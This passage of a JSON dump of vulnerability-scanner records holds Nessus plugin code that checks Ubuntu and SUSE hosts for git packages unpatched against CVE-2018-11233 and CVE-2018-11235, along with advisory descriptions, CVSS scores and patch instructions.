or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|17\\.10|18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 17.10 / 18.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"git\", pkgver:\"1:1.9.1-1ubuntu0.8\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"git\", pkgver:\"1:2.7.4-0ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"git\", pkgver:\"1:2.14.1-1ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"git\", pkgver:\"1:2.17.1-1ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:29:31", "description": "This update for git to version 2.16.4 fixes several issues. 
These security issues were fixed :\n\n - CVE-2018-11233: Path sanity-checks on NTFS allowed attackers to read arbitrary memory (bsc#1095218)\n\n - CVE-2018-11235: Arbitrary code execution when recursively cloning a malicious repository (bsc#1095219)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-02T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : git (SUSE-SU-2018:1872-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2021-01-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:git", "p-cpe:/a:novell:suse_linux:git-arch", "p-cpe:/a:novell:suse_linux:git-core", "p-cpe:/a:novell:suse_linux:git-core-debuginfo", "p-cpe:/a:novell:suse_linux:git-cvs", "p-cpe:/a:novell:suse_linux:git-daemon", "p-cpe:/a:novell:suse_linux:git-daemon-debuginfo", "p-cpe:/a:novell:suse_linux:git-debuginfo", "p-cpe:/a:novell:suse_linux:git-debugsource", "p-cpe:/a:novell:suse_linux:git-email", "p-cpe:/a:novell:suse_linux:git-gui", "p-cpe:/a:novell:suse_linux:git-svn", "p-cpe:/a:novell:suse_linux:git-svn-debuginfo", "p-cpe:/a:novell:suse_linux:git-web", "p-cpe:/a:novell:suse_linux:gitk", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2018-1872-1.NASL", "href": "https://www.tenable.com/plugins/nessus/120026", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1872-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(120026);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n 
script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : git (SUSE-SU-2018:1872-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for git to version 2.16.4 fixes several issues. These\nsecurity issues were fixed :\n\n - CVE-2018-11233: Path sanity-checks on NTFS allowed\n attackers to read arbitrary memory (bsc#1095218)\n\n - CVE-2018-11235: Arbitrary code execution when\n recursively cloning a malicious repository (bsc#1095219)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11233/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11235/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181872-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?05e8a403\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Development Tools 15:zypper in -t\npatch 
SUSE-SLE-Module-Development-Tools-15-2018-1267=1\n\nSUSE Linux Enterprise Module for Basesystem 15:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-2018-1267=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-arch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-daemon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-svn-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-web\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! 
preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-arch-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-core-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-core-debuginfo-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-cvs-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-daemon-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-daemon-debuginfo-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-debuginfo-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-debugsource-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-email-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-gui-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-svn-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-svn-debuginfo-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-web-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"gitk-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-arch-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-core-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-core-debuginfo-2.16.4-3.3.2\")) 
flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-cvs-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-daemon-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-daemon-debuginfo-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-debuginfo-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-debugsource-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-email-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-gui-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-svn-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-svn-debuginfo-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-web-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"gitk-2.16.4-3.3.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:02", "description": "This update for git fixes several issues. These security issues were fixed :\n\n - CVE-2018-11233: Path sanity-checks on NTFS allowed attackers to read arbitrary memory (bsc#1095218)\n\n - CVE-2018-11235: Arbitrary code execution when recursively cloning a malicious repository (bsc#1095219)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-08T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : git (SUSE-SU-2018:1566-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-09-10T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:git-core", "p-cpe:/a:novell:suse_linux:git-core-debuginfo", "p-cpe:/a:novell:suse_linux:git-debugsource", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2018-1566-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110411", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1566-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110411);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n\n script_name(english:\"SUSE SLES12 Security Update : git (SUSE-SU-2018:1566-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for git fixes several issues. These security issues were\nfixed :\n\n - CVE-2018-11233: Path sanity-checks on NTFS allowed\n attackers to read arbitrary memory (bsc#1095218)\n\n - CVE-2018-11235: Arbitrary code execution when\n recursively cloning a malicious repository (bsc#1095219)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11233/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11235/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181566-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5d5ec3b7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 8:zypper in -t patch\nSUSE-OpenStack-Cloud-8-2018-1080=1\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2018-1080=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2018-1080=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-1080=1\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2018-1080=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-1080=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-1080=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2018-1080=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2018-1080=1\n\nSUSE Enterprise Storage 4:zypper in -t patch\nSUSE-Storage-4-2018-1080=1\n\nSUSE CaaS Platform ALL :\n\nTo install 
this update, use the SUSE CaaS Platform Velum dashboard. It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2018-1080=1\n\nHPE Helion OpenStack 8:zypper in -t patch\nHPE-Helion-OpenStack-8-2018-1080=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(0|1|2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0/1/2/3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"git-core-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"git-core-debuginfo-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"git-debugsource-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"git-core-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"git-core-debuginfo-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"git-debugsource-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-core-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-core-debuginfo-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-debugsource-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-core-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-core-debuginfo-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-debugsource-2.12.3-27.14.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:30:33", "description": "This update for git fixes several issues.\n\nThese security issues were fixed :\n\nCVE-2018-11233: Path sanity-checks on NTFS allowed attackers to read arbitrary memory (bsc#1095218)\n\nCVE-2018-11235: Arbitrary code execution when recursively cloning a malicious repository 
(bsc#1095219)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-10-22T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : git (SUSE-SU-2018:1566-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-09-10T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:git-core", "p-cpe:/a:novell:suse_linux:git-core-debuginfo", "p-cpe:/a:novell:suse_linux:git-debugsource", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2018-1566-2.NASL", "href": "https://www.tenable.com/plugins/nessus/118260", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1566-2.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118260);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n\n script_name(english:\"SUSE SLES12 Security Update : git (SUSE-SU-2018:1566-2)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for git fixes several issues.\n\nThese security issues were fixed :\n\nCVE-2018-11233: Path sanity-checks on NTFS allowed attackers to read\narbitrary memory (bsc#1095218)\n\nCVE-2018-11235: Arbitrary code execution when recursively cloning a\nmalicious repository (bsc#1095219)\n\nNote that Tenable Network Security has extracted the 
preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11233/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11235/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181566-2/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?875d920b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2018-1080=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif 